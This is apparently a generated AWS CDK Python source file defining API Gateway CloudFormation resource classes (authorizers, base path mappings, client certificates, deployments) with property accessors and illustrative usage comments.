class CfnAuthorizerV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizerV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Authorizer``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Authorizer
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, authorizer_type: str, authorizer_uri: str, identity_source: typing.List[str], name: str, authorizer_credentials_arn: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, identity_validation_expression: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Authorizer``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::Authorizer.ApiId``.
:param authorizer_type: ``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
:param authorizer_uri: ``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
:param identity_source: ``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
:param name: ``AWS::ApiGatewayV2::Authorizer.Name``.
:param authorizer_credentials_arn: ``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
:param identity_validation_expression: ``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
"""
props = CfnAuthorizerV2Props(api_id=api_id, authorizer_type=authorizer_type, authorizer_uri=authorizer_uri, identity_source=identity_source, name=name, authorizer_credentials_arn=authorizer_credentials_arn, authorizer_result_ttl_in_seconds=authorizer_result_ttl_in_seconds, identity_validation_expression=identity_validation_expression)
jsii.create(CfnAuthorizerV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="authorizerType")
def authorizer_type(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizertype
"""
return jsii.get(self, "authorizerType")
@authorizer_type.setter
def authorizer_type(self, value: str):
return jsii.set(self, "authorizerType", value)
@property
@jsii.member(jsii_name="authorizerUri")
def authorizer_uri(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizeruri
"""
return jsii.get(self, "authorizerUri")
@authorizer_uri.setter
def authorizer_uri(self, value: str):
return jsii.set(self, "authorizerUri", value)
@property
@jsii.member(jsii_name="identitySource")
def identity_source(self) -> typing.List[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identitysource
"""
return jsii.get(self, "identitySource")
@identity_source.setter
def identity_source(self, value: typing.List[str]):
return jsii.set(self, "identitySource", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="authorizerCredentialsArn")
def authorizer_credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizercredentialsarn
"""
return jsii.get(self, "authorizerCredentialsArn")
@authorizer_credentials_arn.setter
def authorizer_credentials_arn(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerCredentialsArn", value)
@property
@jsii.member(jsii_name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizerresultttlinseconds
"""
return jsii.get(self, "authorizerResultTtlInSeconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "authorizerResultTtlInSeconds", value)
@property
@jsii.member(jsii_name="identityValidationExpression")
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identityvalidationexpression
"""
return jsii.get(self, "identityValidationExpression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: typing.Optional[str]):
return jsii.set(self, "identityValidationExpression", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizerV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'authorizer_type': 'authorizerType', 'authorizer_uri': 'authorizerUri', 'identity_source': 'identitySource', 'name': 'name', 'authorizer_credentials_arn': 'authorizerCredentialsArn', 'authorizer_result_ttl_in_seconds': 'authorizerResultTtlInSeconds', 'identity_validation_expression': 'identityValidationExpression'})
class CfnAuthorizerV2Props():
def __init__(self, *, api_id: str, authorizer_type: str, authorizer_uri: str, identity_source: typing.List[str], name: str, authorizer_credentials_arn: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, identity_validation_expression: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Authorizer``.
:param api_id: ``AWS::ApiGatewayV2::Authorizer.ApiId``.
:param authorizer_type: ``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
:param authorizer_uri: ``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
:param identity_source: ``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
:param name: ``AWS::ApiGatewayV2::Authorizer.Name``.
:param authorizer_credentials_arn: ``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
:param identity_validation_expression: ``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html
"""
self._values = {
'api_id': api_id,
'authorizer_type': authorizer_type,
'authorizer_uri': authorizer_uri,
'identity_source': identity_source,
'name': name,
}
if authorizer_credentials_arn is not None: self._values["authorizer_credentials_arn"] = authorizer_credentials_arn
if authorizer_result_ttl_in_seconds is not None: self._values["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
if identity_validation_expression is not None: self._values["identity_validation_expression"] = identity_validation_expression
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-apiid
"""
return self._values.get('api_id')
@property
def authorizer_type(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizertype
"""
return self._values.get('authorizer_type')
@property
def authorizer_uri(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizeruri
"""
return self._values.get('authorizer_uri')
@property
def identity_source(self) -> typing.List[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identitysource
"""
return self._values.get('identity_source')
@property
def name(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-name
"""
return self._values.get('name')
@property
def authorizer_credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizercredentialsarn
"""
return self._values.get('authorizer_credentials_arn')
@property
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizerresultttlinseconds
"""
return self._values.get('authorizer_result_ttl_in_seconds')
@property
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identityvalidationexpression
"""
return self._values.get('identity_validation_expression')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnAuthorizerV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
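# Illustrative sketch (editorial addition): the V2 variant targets
# ``AWS::ApiGatewayV2`` (HTTP and WebSocket APIs). Note that here
# ``identity_source`` is a list and ``authorizer_uri`` is required. All
# identifiers are placeholders; ``stack`` and ``apigw`` are assumed from the
# sketch above:
#
#     apigw.CfnAuthorizerV2(stack, "V2RequestAuthorizer",
#         api_id="api-123",          # placeholder ApiGatewayV2 API id
#         authorizer_type="REQUEST",
#         authorizer_uri="arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/<lambda-arn>/invocations",
#         identity_source=["route.request.header.Authorization"],
#         name="v2-request-authorizer",
#     )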
@jsii.implements(aws_cdk.core.IInspectable)
class CfnBasePathMapping(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnBasePathMapping"):
"""A CloudFormation ``AWS::ApiGateway::BasePathMapping``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::BasePathMapping
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, base_path: typing.Optional[str]=None, rest_api_id: typing.Optional[str]=None, stage: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::BasePathMapping``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param domain_name: ``AWS::ApiGateway::BasePathMapping.DomainName``.
:param base_path: ``AWS::ApiGateway::BasePathMapping.BasePath``.
:param rest_api_id: ``AWS::ApiGateway::BasePathMapping.RestApiId``.
:param stage: ``AWS::ApiGateway::BasePathMapping.Stage``.
"""
props = CfnBasePathMappingProps(domain_name=domain_name, base_path=base_path, rest_api_id=rest_api_id, stage=stage)
jsii.create(CfnBasePathMapping, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGateway::BasePathMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="basePath")
def base_path(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.BasePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-basepath
"""
return jsii.get(self, "basePath")
@base_path.setter
def base_path(self, value: typing.Optional[str]):
return jsii.set(self, "basePath", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: typing.Optional[str]):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="stage")
def stage(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-stage
"""
return jsii.get(self, "stage")
@stage.setter
def stage(self, value: typing.Optional[str]):
return jsii.set(self, "stage", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnBasePathMappingProps", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'base_path': 'basePath', 'rest_api_id': 'restApiId', 'stage': 'stage'})
class CfnBasePathMappingProps():
def __init__(self, *, domain_name: str, base_path: typing.Optional[str]=None, rest_api_id: typing.Optional[str]=None, stage: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::BasePathMapping``.
:param domain_name: ``AWS::ApiGateway::BasePathMapping.DomainName``.
:param base_path: ``AWS::ApiGateway::BasePathMapping.BasePath``.
:param rest_api_id: ``AWS::ApiGateway::BasePathMapping.RestApiId``.
:param stage: ``AWS::ApiGateway::BasePathMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html
"""
self._values = {
'domain_name': domain_name,
}
if base_path is not None: self._values["base_path"] = base_path
if rest_api_id is not None: self._values["rest_api_id"] = rest_api_id
if stage is not None: self._values["stage"] = stage
@property
def domain_name(self) -> str:
"""``AWS::ApiGateway::BasePathMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-domainname
"""
return self._values.get('domain_name')
@property
def base_path(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.BasePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-basepath
"""
return self._values.get('base_path')
@property
def rest_api_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-restapiid
"""
return self._values.get('rest_api_id')
@property
def stage(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-stage
"""
return self._values.get('stage')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnBasePathMappingProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
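# Illustrative sketch (editorial addition): a base path mapping routes
# requests for a custom domain to a stage of a REST API, so requests to
# ``api.example.com/v1/...`` below land on the ``prod`` stage. The domain
# must already exist as an ``AWS::ApiGateway::DomainName``; all values are
# placeholders:
#
#     apigw.CfnBasePathMapping(stack, "V1Mapping",
#         domain_name="api.example.com",
#         base_path="v1",
#         rest_api_id="abc123",
#         stage="prod",
#     )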
@jsii.implements(aws_cdk.core.IInspectable)
class CfnClientCertificate(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnClientCertificate"):
"""A CloudFormation ``AWS::ApiGateway::ClientCertificate``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::ClientCertificate
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, description: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None) -> None:
"""Create a new ``AWS::ApiGateway::ClientCertificate``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param description: ``AWS::ApiGateway::ClientCertificate.Description``.
:param tags: ``AWS::ApiGateway::ClientCertificate.Tags``.
"""
props = CfnClientCertificateProps(description=description, tags=tags)
jsii.create(CfnClientCertificate, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::ClientCertificate.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ClientCertificate.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnClientCertificateProps", jsii_struct_bases=[], name_mapping={'description': 'description', 'tags': 'tags'})
class CfnClientCertificateProps():
def __init__(self, *, description: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None):
"""Properties for defining a ``AWS::ApiGateway::ClientCertificate``.
:param description: ``AWS::ApiGateway::ClientCertificate.Description``.
:param tags: ``AWS::ApiGateway::ClientCertificate.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html
"""
self._values = {
}
if description is not None: self._values["description"] = description
if tags is not None: self._values["tags"] = tags
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ClientCertificate.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-description
"""
return self._values.get('description')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::ClientCertificate.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnClientCertificateProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
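# Illustrative sketch (editorial addition): both properties are optional, so
# a bare ``CfnClientCertificate(stack, "Cert")`` is also valid; tags take the
# generic ``aws_cdk.core.CfnTag`` shape:
#
#     apigw.CfnClientCertificate(stack, "BackendClientCert",
#         description="Certificate API Gateway presents to the backend",
#         tags=[core.CfnTag(key="team", value="platform")],
#     )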
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDeployment(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDeployment"):
"""A CloudFormation ``AWS::ApiGateway::Deployment``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Deployment
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, deployment_canary_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["DeploymentCanarySettingsProperty"]]]=None, description: typing.Optional[str]=None, stage_description: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["StageDescriptionProperty"]]]=None, stage_name: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::Deployment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param rest_api_id: ``AWS::ApiGateway::Deployment.RestApiId``.
:param deployment_canary_settings: ``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
:param description: ``AWS::ApiGateway::Deployment.Description``.
:param stage_description: ``AWS::ApiGateway::Deployment.StageDescription``.
:param stage_name: ``AWS::ApiGateway::Deployment.StageName``.
"""
props = CfnDeploymentProps(rest_api_id=rest_api_id, deployment_canary_settings=deployment_canary_settings, description=description, stage_description=stage_description, stage_name=stage_name)
jsii.create(CfnDeployment, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Deployment.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="deploymentCanarySettings")
def deployment_canary_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["DeploymentCanarySettingsProperty"]]]:
"""``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-deploymentcanarysettings
"""
return jsii.get(self, "deploymentCanarySettings")
@deployment_canary_settings.setter
def deployment_canary_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["DeploymentCanarySettingsProperty"]]]):
return jsii.set(self, "deploymentCanarySettings", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="stageDescription")
def stage_description(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["StageDescriptionProperty"]]]:
"""``AWS::ApiGateway::Deployment.StageDescription``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagedescription
"""
return jsii.get(self, "stageDescription")
@stage_description.setter
def stage_description(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["StageDescriptionProperty"]]]):
return jsii.set(self, "stageDescription", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: typing.Optional[str]):
return jsii.set(self, "stageName", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.AccessLogSettingProperty", jsii_struct_bases=[], name_mapping={'destination_arn': 'destinationArn', 'format': 'format'})
class AccessLogSettingProperty():
def __init__(self, *, destination_arn: typing.Optional[str]=None, format: typing.Optional[str]=None):
"""
:param destination_arn: ``CfnDeployment.AccessLogSettingProperty.DestinationArn``.
:param format: ``CfnDeployment.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-accesslogsetting.html
"""
self._values = {
}
if destination_arn is not None: self._values["destination_arn"] = destination_arn
if format is not None: self._values["format"] = format
@property
def destination_arn(self) -> typing.Optional[str]:
"""``CfnDeployment.AccessLogSettingProperty.DestinationArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-accesslogsetting.html#cfn-apigateway-deployment-accesslogsetting-destinationarn
"""
return self._values.get('destination_arn')
@property
def format(self) -> typing.Optional[str]:
"""``CfnDeployment.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-accesslogsetting.html#cfn-apigateway-deployment-accesslogsetting-format
"""
return self._values.get('format')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AccessLogSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
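# Illustrative sketch (editorial addition): the ``format`` string uses API
# Gateway ``$context`` access-log variables; the log-group ARN is a
# placeholder:
#
#     access_logs = apigw.CfnDeployment.AccessLogSettingProperty(
#         destination_arn="arn:aws:logs:us-east-1:111122223333:log-group:api-access",
#         format='{"requestId":"$context.requestId","status":"$context.status"}',
#     )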
